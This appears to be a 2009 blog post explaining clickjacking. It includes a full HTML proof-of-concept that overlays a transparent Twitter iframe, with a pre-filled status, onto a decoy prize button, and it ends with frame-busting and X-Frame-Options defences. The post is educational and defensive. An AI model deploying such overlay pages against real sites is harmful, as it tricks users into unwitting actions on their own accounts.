‘Clickjacking’, if you haven’t heard of it, is a technique attackers use to trick users like you into clicking something without knowing what you’ve actually clicked. It’s also known as UI redressing, and it relies on nothing more exotic than the browser supporting frames and CSS positioning, which every mainstream browser does.
The original concern was Flash: the 2008 demo by Robert Hansen and Jeremiah Grossman showed how a user could unknowingly enable their webcam and microphone so the attacker would have access to them. There are some other examples shown here: http://www.grc.com/sn/notes-168.htm.
Adobe resolved this issue in October of last year with the release of Flash Player 10. Obviously this only offers protection for that particular exploit (gaining access to the webcam/microphone); the more rudimentary techniques still work perfectly today.
And here’s a script you could use to strip every iframe out of the page you’re currently viewing (it walks the live collection backwards, so removing an element never skips the next one):
// Remove all iframes from the current document; getElementsByTagName returns a live list, hence the reverse loop.
var all = document.getElementsByTagName('iframe'), l = all.length; while (l--) all[l].parentNode.removeChild(all[l]);
THIS NO LONGER WORKS (as of ~6:45 PM, 12/Feb’09), TWITTER HAS IMPLEMENTED A FRAME-BREAKING SCRIPT » This is a good thing!
Using the basic technique of positioning an invisible iframe over a button, coupled with Twitter’s ‘status’ URL parameter (which pre-fills the update box), I have created a small demo which shows you just how serious (and annoying) this could be!
It will only work if you’re currently logged into Twitter (and only if you haven’t got any of the above measures in place):
- Go to Twitter, make sure you’re logged in.
- Go to this page: qd9.co.uk/temp/ClickJackEg.html
- Click the button.
- Wait about two seconds
- Go to your Twitter page; look at your latest status!
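Here is what a page of that kind looks like, as an added example written for this article rather than the demo page linked above. The ‘status’ parameter is the one the demo relies on; the /home path, the decoy text and the pixel offsets are assumptions, and the offsets in particular have to be measured against the real layout so that Twitter’s update button ends up exactly underneath the decoy:

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Win a prize!</title>
<style>
  /* The visible decoy: what the victim believes they are clicking. */
  #decoy {
    position: absolute; top: 100px; left: 100px;
    width: 120px; height: 30px; font-size: 16px;
    z-index: 1;
  }
  /* The real target: the framed Twitter page, fully transparent and stacked
     ABOVE the decoy so that it, not the decoy, receives the click.
     top/left are assumed values; they must shift the framed page so the
     update button sits precisely under the decoy. */
  #target {
    position: absolute;
    top: -380px;   /* assumed offset */
    left: -420px;  /* assumed offset */
    width: 1000px; height: 800px;
    border: 0;
    opacity: 0;
    filter: alpha(opacity=0); /* IE6/7, which predate CSS opacity */
    z-index: 2;
  }
</style>
</head>
<body>
  <p>Click the button to claim your prize:</p>
  <button id="decoy">Claim prize</button>
  <!-- The status text is pre-filled by the URL parameter; the victim's own
       click on the (invisible) update button is what submits it.
       The /home path is an assumption for this example. -->
  <iframe id="target"
          src="http://twitter.com/home?status=I%20got%20clickjacked%20%3A-("></iframe>
</body>
</html>
```

Nothing here is a vulnerability in Twitter’s code as such: the framed page behaves exactly as designed, the victim is genuinely logged in, and the request carries their real cookies. The only thing that is ‘wrong’ is that the click landed on a page the victim couldn’t see.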
What does this mean? It means anyone can update your Twitter status without you knowing! Actually, it’s YOU that’s updating it, you just don’t know at the time.
This is a pretty harmless example but I can imagine it being used for more sinister endeavours!
Clickjacking is a dangerous technique; take it seriously! It cannot be halted with a quick browser fix here and there because the problem lies in how frames and CSS are designed to work; it isn’t a software bug in any one product. If you’re fortunate enough to use Firefox then install NoScript; otherwise explore the other measures I described above.
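For site owners, the defence Twitter rolled out is a frame-breaking script. The version below is an added example for this article, not Twitter’s own code, and the form it protects (the /status/update action and its fields) is assumed. The naive one-liner ‘if (top != self) top.location = self.location’ can be neutralised by a hostile parent page (for example with an onbeforeunload handler that cancels the navigation), so this version fails closed: the page is hidden by CSS until the script, running un-framed, reveals it.

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Frame-busting example</title>
<!-- Hide the entire page by default. If the script is blocked, or the
     frame-break redirect is cancelled by the attacker's page, the body
     simply stays hidden and there is nothing for a victim to click. -->
<style id="antiClickjack">
  body { display: none !important; }
</style>
<script type="text/javascript">
  if (self === top) {
    // Not framed: drop the hiding rule and show the page normally.
    var antiClickjack = document.getElementById("antiClickjack");
    antiClickjack.parentNode.removeChild(antiClickjack);
  } else {
    // Framed: try to break out. Even if this navigation is blocked,
    // the body remains display:none.
    top.location = self.location;
  }
</script>
</head>
<body>
  <!-- Hypothetical update form standing in for the real one. -->
  <form method="post" action="/status/update">
    <textarea name="status"></textarea>
    <button type="submit">update</button>
  </form>
</body>
</html>
```

This still depends on JavaScript running in the victim’s browser, so it is belt and braces rather than a complete answer; where the browser supports it (IE8 does, at the time of writing), also send the server-side ‘X-Frame-Options: DENY’ response header so the browser refuses to render the page inside a frame at all, script or no script.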